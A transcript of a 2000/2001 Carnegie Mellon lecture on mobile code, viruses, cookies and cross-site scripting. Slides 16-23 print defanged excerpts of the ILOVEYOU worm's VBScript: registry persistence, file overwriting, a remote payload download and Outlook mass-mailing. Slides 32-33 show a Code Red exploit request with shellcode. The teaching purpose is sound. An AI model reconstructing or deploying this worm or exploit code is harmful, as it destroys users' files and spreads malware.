20771: Computer Security Lecture 5: ATTACK WEEK

About This Presentation

Title:

20771: Computer Security Lecture 5: ATTACK WEEK

Description:

Lecture 5, 20-771: Computer Security, Fall 2001. 1. 20-771: Computer Security ... jcpenny.com TRUE / FALSE 60516333438 SITESERVER ID=69bcf8f963456b19fffdf1ff19f. ... – PowerPoint PPT presentation

Number of Views:190

Avg rating:3.0/5.0

Slides: 42

Provided by: robertth

Category:

more less

Transcript and Presenter's Notes

Title: 20771: Computer Security Lecture 5: ATTACK WEEK

1
20-771 Computer SecurityLecture 5 ATTACK WEEK

Robert Thibadeau
School of Computer Science
Carnegie Mellon University
Institute for eCommerce, Fall 2000

2
Todays lecture

Mobile Code
Break (10 min)
Cookies
Cross Machine Scripting

3
This Week

Chapters 6,7 WS
More on Linux

4
http//xiotech.ulib.org/class
5
X.509v3

Need a public key to open it I.e., you can
authenticate the source
Contains encrypted information that the source
can communicate to you in privacy and with
authority.
Authenticated, private, tamperproof,
authorization
Can be employed as the basis for PKI chaining
authority
Pass something up the chain for approval
(signing) to provide the absolute authority
I.e., the Presidents office confirms such and
such directive.

6
X.509v3 Certificate

-----BEGIN CERTIFICATE-----
MIIDNjCCApgAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMA
kGA1UEBhMCWFkx
FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2
UgVG93bjEXMBUG
A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZm
ljYXRlIEF1dGhv
cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhv
cNAQkBFg9jYUBz
bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMT
gyMTUxWjCBpzEL
MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMB
EGA1UEBxMKU25h
a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBg
NVBAsTDldlYnNl
cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR
8wHQYJKoZIhvcN
AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQ
UAA4GNADCBiQKB
gQC554RoVH0dJONqljPBWC72MDNGNy9eXnzejXrczsHs3Pc9
2Vaat6CpIEEGue
yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9
ziYon8jWsbK2aE
L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImWZds8YEFiAwIDAQ
ABo24wbDAbBgNV
HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGGEIBDQ
QtFittb2Rfc3Ns
IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMB
EGCWCGSAGGEIB
AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nT
kRDQlBdgCcnhy3
hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafL
UMdARVV6BpIGMI
5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJm
jSguYCRt91sU4K
s0dfWsdItkw4uQ

7
X.509v3 Opened!

Certificate
Data
Version 3 (0x2)
Serial Number 1 (0x1)
Signature Algorithm md5WithRSAEncryption
Issuer CXY, STSnake Desert, LSnake
Town, OSnake Oil, Ltd, OUCertificate Authority,
CNSnake Oil CA/Emailca_at_snakeoil.dom
Validity
Not Before Oct 21 182151 1999 GMT
Not After Oct 20 182151 2001 GMT
Subject CXY, STSnake Desert, LSnake
Town, OSnake Oil, Ltd, OUWebserver Team,
CNwww.snakeoil.dom/Emailwww_at_snakeoil.dom
Subject Public Key Info
Public Key Algorithm rsaEncryption
RSA Public Key (1024 bit)
Modulus (1024 bit)

8
509 Opened 2

KEY 00b9e78468f951f474938daa58cf05
6f82ef6303346372f5e5e7
cde8d7ad
ccec1ecdcf73dd9569ab7a0a920410
6b9ec86dbdc5a81bd68ec68f
629182 9558726771ead1
ddd899055b905c15
57d65cbe363d5e2b7fdce26289fc8d
6b1b2b6684f8bea10ad71bc5
d6c738 665d4885992707
3fd55b3bd12ffb22
65be65db3c60416203 Exponent 65537
(0x10001)
X509v3 extensions
X509v3 Subject Alternative Name
emailwww_at_snakeoil.dom
Netscape Comment
mod_ssl generated custom server
certificate
Netscape Cert Type
SSL Server
Signature Algorithm md5WithRSAEncryption
7a311b181935d4479dff9d39110d0941
7600 9c9e1cb7844adf98f365fcea
f98d63a6bae7 de217a82bcce9d2b
b916fca05ba2e8b8a5f7
c829455a7cb50c74045557a069206308e4
b9 9514adec830b89d35bfff74842
b789135a84 fc6076c12ed421ecfc
d6809a01018ecc2668
d282e60246df75b14e0ab3475f5ac748b6
4c 38b9

9
Active ContentAlso called Mobile Code

Web Browsers can download and execute software
automatically without warning.
Software may damage users system or violate
privacy.
Administrator This can tunnel through firewall
protections.
Case U.S. Government came close, within two
weeks, to an executive order that shut down all
mobile code in the government.
Failed This would dumb down Federal employees
and make the Government Stupid.

10
Threats from Mobile Code

Purposefully malicious
Moldovan Connection
Sexygirls.com and Erotic2000.com
Downloaded and ran viewer, program hung up phone
and made long distance call to Moldovan, 2 per
minute.
User taken to site stayed around without knowing
charge.
I Love You Worm probable accidental escape.
Big programs have bugs
Other people will exploit those bugs

11
Traditional Threats

Trojan Horses Very Serious. Often used for
spying. (e.g., change the login program to create
a back door).
Virus Code that replicates itself and inserts
into an executable program or file.
Macro viruses Viruses written in the macro
language of a word processor, or other trusted
program. Becomes infectious on other documents.
Rabbits Programs that make many copies of
themselves. Standalone. Denial of Service.
Worms Similar but spread across network.

12
Many Many Threats

I Love You
Opening email that says I Love You from a
person you know Trojan Horse
Reads your address book Privacy Violation
Deletes image files Havoc
Across Network Worm
Demonstrated
Microsoft Outlook could execute seriously
destructive and intrusive active content without
control of user.

13
Silent Information Thieves!

Access Log - My NeXT Machine in my office (BSD
4.2) (/private/adm/network)
May 9 032305 nageela ftpd2184 refused
connect from 209.233.224.173
May 9 052148 nageela ftpd2203
gethostbyname(adsl-209-233-224-173.pacbell.net)
lookup failure
May 9 052148 nageela ftpd2203 refused
connect from 209.233.224.173
May 10 063251 nageela ftpd2509 connect from
vc3-49d.dsl.indra.com
May 10 065045 nageela ftpd2512 connect from
vc3-49d.dsl.indra.com
May 10 065046 nageela ftpd2513 connect from
vc3-49d.dsl.indra.com
May 13 071142 nageela ftpd4267 connect from
bilbo.ee.ualberta.ca
May 16 194624 nageela telnetd5775 connect
from 209.208.174.4
May 16 194624 nageela ftpd5776 connect from
209.208.174.4
May 16 194624 nageela ftpd5774 connect from
209.208.174.4
May 16 194624 nageela telnetd5777 connect
from 209.208.174.4
May 21 030653 nageela telnetd8119 connect
from hermes.globalwebdesign.com
May 21 030654 nageela telnetd8120 connect
from hermes.globalwebdesign.com
May 21 030654 nageela ftpd8121 connect from
hermes.globalwebdesign.com
May 23 070629 nageela telnetd9035 connect
from spaceace.vi.ri.cmu.edu
May 24 015535 nageela ftpd9277 connect from
208.135.135.76
May 28 050238 nageela ftpd11282 connect from
cx884963-a.chnd1.az.home.com
May 29 021638 nageela ftpd11749 connect from
194.204.246.130

14
(No Transcript)
15
Economic CostsComputer Economics 8-01

Love Bug 8.7 Billion
Melissa 1.2 Billion
Code Red 2.6 Billion
250,000 systems in just nine hours on July 19
150,000 in 24 on Aug 1 After Warnings
Repair costs and loss of productivity and unknown
cost of asset loss

16
I Love You Code(virus has been killed) had name
vxryfunny.vbs

rxm barok -lovxlxttxr(vbx)
rxm by spydxr / ispydxr_at_mail.com /
_at_GRAMMxRSoft Group / Manila,Philippinxs
dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
Sxt fso CrxatxObj("Scripting.FilxSystxmObj")
sxt filx fso.OpxnTxxt(WScript.ScriptFullnamx,1)
vbscopyfilx.RxadAll

17
I Love You Code 2

main()
sxt wscrCrxatxObj("WScript.Shxll")
rrwscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Micros
oft\Windows Scripting Host\Sxttings\Timxout")
wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsof
t\Windows Scripting Host\Sxttings\Timxout",0,"RxG_
DWORD"
Sxt dirwin fso.GxtSpxcialFoldxr(0)
Sxt dirsystxm fso.GxtSpxcialFoldxr(1)
Sxt dirtxmp fso.GxtSpxcialFoldxr(2)
Sxt c fso.GxtFilx(WScript.ScriptFullNamx)
c.Copy(dirsystxm"\MSKxrnxl32.vbs")
c.Copy(dirwin"\Win32DLL.vbs")
c.Copy(dirsystxm"\Vxry Funny.vbs")
rxgruns()
html()
sprxadtoxmail()
listadriv()

18
I Love You Code 3 rxgruns()

sub rxgruns()
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
indows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm"\
MSKxrnxl32.vbs"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
indows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin
"\Win32DLL.vbs"
Dnrxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
txrnxt xxplorxr\Download Dirory")
rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt
xxplorxr\Main\Start Pagx","http//www.skyinxt.nxt/
young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw658
7345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\W
indows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad"\
WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\In
txrnxt xxplorxr\Main\Start Pagx","aboutblank"
xnd sub

19
I Love You Code 4Listing the Drives on Your
Machine(there were several of these utility-type
spies)

sub listadriv
Dim d,dc,s
Sxt dc fso.Drivxs
For xach d in dc
If d.DrivxTypx 2 or d.DrivxTypx3 Thxn
foldxrlist(d.path"\")
xnd if
Nxxt
listadriv s
xnd sub

20
I Love You Code 5re-writing jpg files

sub inffilxs(foldxrspxc)
sxt f fso.GxtFoldxr(foldxrspxc)
sxt fc f.Filxs
for xach f1 in fc
xxtfso.GxtxxtxnsionNamx(f1.path)
if (xxt"vbs") or (xxt"vbx") thxn
sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
xlsxif(xxt"jpg") or (xxt"jpxg") thxn
sxt apfso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx (did same for mp3 files and others)

21
if (xqfoldxrspxc) thxnif (s"mirc32.xxx") or
(s"mlink32.xxx") or (s"mirc.ini") or
(s"script.ini") or (s"mirc.hlp") thxnsxt
scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.i
ni")scriptini.WritxLinx "script"scriptini.Writ
xLinx "mIRC Script"scriptini.WritxLinx "
Plxasx dont xdit this script... mIRC will
corrupt, if mIRC will"scriptini.WritxLinx "
corrupt... WINDOWS will aff and will not run
corrly. thanks"scriptini.WritxLinx
""scriptini.WritxLinx "Khalxd
Mardam-Bxy"scriptini.WritxLinx
"http//www.mirc.com"scriptini.WritxLinx
""scriptini.WritxLinx "n0on 1JOIN"scripti
ni.WritxLinx "n1 /if ( nick mx ) halt
"scriptini.WritxLinx "n2 /.dcc sxnd nick
"dirsystxm"\Vxry Funny.HTM"scriptini.WritxLinx
"n3"scriptini.closxxqfoldxrspxcnxxt xnd
sub
I Love You Code 6 .ini
22
if (xqfoldxrspxc) thxnif (s"mirc32.xxx") or
(s"mlink32.xxx") or (s"mirc.ini") or
(s"script.ini") or (s"mirc.hlp") thxnsxt
scriptinifso.CrxatxTxxtFilx(foldxrspxc"\script.i
ni")scriptini.WritxLinx "script"scriptini.Writ
xLinx "mIRC Script"scriptini.WritxLinx "
Plxasx dont xdit this script... mIRC will
corrupt, if mIRC will"scriptini.WritxLinx "
corrupt... WINDOWS will aff and will not run
corrly. thanks"scriptini.WritxLinx
""scriptini.WritxLinx "Khalxd
Mardam-Bxy"scriptini.WritxLinx
"http//www.mirc.com"scriptini.WritxLinx
""scriptini.WritxLinx "n0on 1JOIN"scripti
ni.WritxLinx "n1 /if ( nick mx ) halt
"scriptini.WritxLinx "n2 /.dcc sxnd nick
"dirsystxm"\Vxry Funny.HTM"scriptini.WritxLinx
"n3"scriptini.closxxqfoldxrspxcnxxt xnd
sub
I Love You Code 7 .ini file
23
sub sprxadtoxmail()sxt rxgxditCrxatxObj("WScript
.Shxll")sxt outWScript.CrxatxObj("Outlook.Applic
ation")sxt mapiout.GxtNamxSpacx("MAPI")for
ctrlists1 to mapi.AddrxssLists.Countsxt
amapi.AddrxssLists(ctrlists)rxgvrxgxdit.RxgRxad
("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"a)if
(int(a.Addrxssxntrixs.Count)int(rxgv)) thxnfor
ctrxntrixs1 to a.Addrxssxntrixs.Countmalxada.Ad
drxssxntrixs(x)rxgad""rxgadrxgxdit.RxgRxad("HK
xY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"malxad)i
f (rxgad"") thxnsxt malxout.CrxatxItxm(0)malx.
Rxcipixnts.Add(malxad)malx.Subj "fwd
Jokx"malx.Body vbcrlf""malx.Attachmxnts.Add(d
irsystxm"\Vxry Funny.vbs")malx.SxndSxt
outNothingSxt mapiNothingxnd sub
I Love You Code 8 spread mail
24
Silent Attacks

I should be obvious it would not be hard to
create a silent worm that sends mail on file
systems, files, and address lists (and also all
your mail on your local machine).
We can do this with your web browser too
Code Red is only ONE example

25
Virus Checkers

Pattern match in secret ways to find viral
fingerprints
Use a technique called finite state automata to
create very fast search over your files.
If virus is not known already, it will do damage.
Finding silent viruses may be hard.

26
Break!
27
Authenticode System

Windows 2000
Running code requires a X.509v3 Certificate with
an approved CA
Personal Publishers (ID with Credit Bureau)
Commercial Publishers (Articles of Incorporation)
Sign a pledge reasonable care consistent with
prevailing industry standards to keep code free
from viruses, malicious code, and other dta that
may damage, misappropriate, or otherwise
interfere with a third partys operations.
Remedy Revoke your Certificate (HA!)

28
Steps you can Take

Dont run as administrator/root
Use Virus Checkers (but watch those companies!!!)
Backup Often
Verify the integrity and authenticity of
software.
A very good idea is to not accept active code
without a certificate that guarantees the author
can be found!
Same principle as mutually assured destruction
or keep the pilot on the plane! He wont hurt
you if you can hurt him.

29
Finally,

Even if Adobe is the authentic code
writer/distributor, get them to agree to your
privacy!

30
Record of URLs youve visited

Browser History file, document cache, and cookies
Unix spools or /var/adm / Windows /winnt,
/windows, program files/netscape etc.
Mobile code can read these.
Organizations firewall or proxy server (most have
logging capability)
ISPs firewall, router, or proxy server.
Each of the remote servers youve visited.

31
Web Server

Standard Logs
HTTP header information
Date, From, URI, Referrer, Response Status to
Request
Also from HTTPS! (The Server Knows!)
Logs are essential to security
Fancier Logs
HTTP
Whats in the forms
Whats in the responses
Really fancy
Dynamically changing information based on where
youve been.
Tracking across web servers.

32
Code Red Log

12.27.8.161 - - 09/Sep/2001040707 -0400 "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXu9090u6858
ucbd3u7801u9090u6858ucbd3u7801u9090u6858uc
bd3u7801u9090u9090u8190u00c3u0003u8b00u531
bu53ffu0078u0000u00a HTTP/1.0" 404 278

33
Code Red I and IIhttp//www.eeye.com/html/Researc
h/Advisories/AL20010804.html

U9090
u6858
ucbd3
u7801
u9090
u6858
ucbd3
u7801
u9090
u6858
ucbd3
u7801
u9090
u9090
u8190
u00c3
u0003
u8b00
u531b

u9090
u6858
ucbd3
u7801
u9090
u6858
ucbd3
u7801
u9090
u6858
ucbd3
u7801
u9090
u9090
u8190
u00c3
u0003
u8b00
u531b

34
Cookies (netscape cookie file)

URL-Invoking-It domain? Path in Server
https? Expiration Name value
www.airtime.co.uk FALSE /users/wysywig/
FALSE 968081837 username aaa
www.kbb.com FALSE /kb/ki.dll FALSE
9519638334 zipcode 15638
www.jcpenney.com FALSE /jcp FALSE
126632340 ShopperManager6Fjcp
SHOPPERMANAGER6FJCP6EJSN34316NP100L1RURQ8HHF8MX3
4
www.buy.com FALSE /bc FALSE 128333061
ShopperManager6F SHOPPERMANAGER6FVQ8VSKLC
WHSN000CM9C9JS7EDVL1
.doubleclick.net TRUE / FALSE
196034991340 id 39609560
.lycos.com TRUE / FALSE 161735952
CyberTargetAnonymous LYC000AFBAE77275BF6D2734BF
CF563A16
.cmgi.com TRUE / FALSE 16173595634
CyberGlobalAnonymous CTG00017D567763405BF1FB34
F8BFCD8B1D33
.webcrawler.com TRUE / FALSE
9342341600 registered no
.webcrawler.com TRUE / FALSE
9342341600 UID 210076B35C89A5C
.microsoft.com TRUE / FALSE
1065303482 MC1 GUIDDF160779710D118B1808006B
B734F3F
.washingtonpost.com TRUE / FALSE
9342951343 RMID 98c81c8d3606d690
www.americanbible.org FALSE / FALSE
16308113498 Int 343 346 38 3 343 38 30 3
334 68 5 3
www.americanbible.org FALSE / FALSE
1630811600 User Profile F633C7686DA1FDBE8588
0034CDB11

35
Cookies (netscape cookie file)

URL-Invoking-It domain? Path in Server
https? Expiration Name value
www.antiquebooks.net FALSE / FALSE
938368777 ulantique 7-1-6-win-ns
classics.mit.edu FALSE / FALSE
934285095 ICA_last_work Homer.iliad
.jcpenny.com TRUE / FALSE 60516333438
SITESERVER ID69bcf8f963456b19fffdf1ff19f
.amazon.com TRUE / FALSE 6086797993
ubid-main 06-6073435981034
nonprofit.guidestar.org FALSE / FALSE
613723673 CFID 95690
.google.com TRUE / FALSE
6134736834347 ID 34816dff31190ff80
.cmu.edu TRUE / FALSE 6051263400
SITESERVER IDf8185834df6bac5f80a793a534c18
.waterhouse.com TRUE / FALSE
963585098 accountno 35869873
tracking.carprices.com FALSE / FALSE
9634234581 PARTNER CARPRICES
tracking.carprices.com FALSE / FALSE
9634234581 MEMB_ID -1
tracking.carprices.com FALSE / FALSE
9634234581 USER 10.8.1.35-1
tracking.carprices.com FALSE / FALSE
9634234578 RETURN VISITOR

36
Cookies Server Writes to Browser

Set-Cookie NAMEVALUE expiresDATE pathPATH
domainDOMAIN_NAME secure
NAMEVALUE
expiresDATE
domainDOMAIN_NAME
The default value of domain is the host name of
the server which generated the cookie response.
pathPATH
The path attribute is used to specify the subset
of URLs in a domain for which the cookie is
valid.
secure
If a cookie is marked secure, it will only be
transmitted if the communications channel with
the host is a secure one. Currently this means
that secure cookies will only be sent to HTTPS
(HTTP over SSL) servers. If secure is not
specified, a cookie is considered safe to be sent
in the clear over unsecured channels.

37
Browser Volunteers Cookie to Server!

If Browser visits the URL again, it volunteers
cookie name and contents to the URL
Cookie NAME1OPAQUE_STRING1 NAME2OPAQUE_STRING2
...
Server Database can contain
Cookie Name
Opaque String
Who (what IP/Host/User/etc) reported it
When

38
Cookie Source Codewww.mozilla.org

host \t isDomain \t path \t xxx \t expires \t
name \t cookie from http//lxr.mozilla.org/seamonk
ey/source/extensions/cookie/nsCookie.cpp2078
JavaScript Interface! Red - read only
Name Type
Description
path string
path the cookie applies to
domain string
domain the cookie applies to
name string
name of the cookie
value string
value of the cookie
expires string
date the cookie expires
url string
url setting the cookie TROJAN HORSE
OPPORTUNITY!
isSecure boolean
the cookie is sent over secure connections only
isDomain boolean
the cookie has a domain attribute
prompt boolean
user has configured prefs to throw cookie
confirm dialog
preference int
the user's cookie acceptance value
accept() method
allows the cookie to be set
reject() method
causes the cookie not to be set
ask() method
prompt a netlib confirmation dialog
(happens during netlib
set cookie execution)

39
Cookies - Notes

Multiple Set-Cookie headers in single server
response.
Same path but different names will add additional
mappings.
Higher-level path value not override specific
path mappings.
Expires header lets client purge the mapping but
not required.
Number of cookies that a client can store at any
one time.
300 total cookies
4 kilobytes per cookie
20 cookies per server domain.
CGI script deletes a cookie by returning same
cookie expired time.
This requirement makes it difficult for anyone
but the originator of a cookie to delete a
cookie.
Set-cookie response header should never be
cached.
If proxy server receives response containing
Set-cookie, it should propagate the Set-cookie
header to the client, regardless of whether the
response was 304 (Not Modified) or 200 (OK).
Similarly, if a client request contains a Cookie
header, it should be forwarded through a proxy,
even if the conditional If-modified-since request
is being made.

40
Two Sides

Buyer wants things without exposing any
information he discloses to any use other than
what they MUST have to give him the things he
wants. (Cryptophilia)
Seller wants to know as much about Buyer as
possible because this gives him control over
Buyers and therefore revenue. He can also sell
this information (e.g., to advertisers). He wants
unrestricted use of this information.
BUT, Buyers now collect information on Sellers
and misuse that (The Sky is Falling.)
An Agreement is bilateral. The Internet can make
possible agreements public and thereby expose
both Sellers and Buyers to violations.

41
Cross Site Scripting

Same as cross machine cookies
Fill in a form with a script (
Web Server returns blindly printing script
Filter these characters out
" ' ) ( -
But, What about the situation where you want
somebody to click you and know where they clicked
from (double click).

Write a Comment

User Comments (0)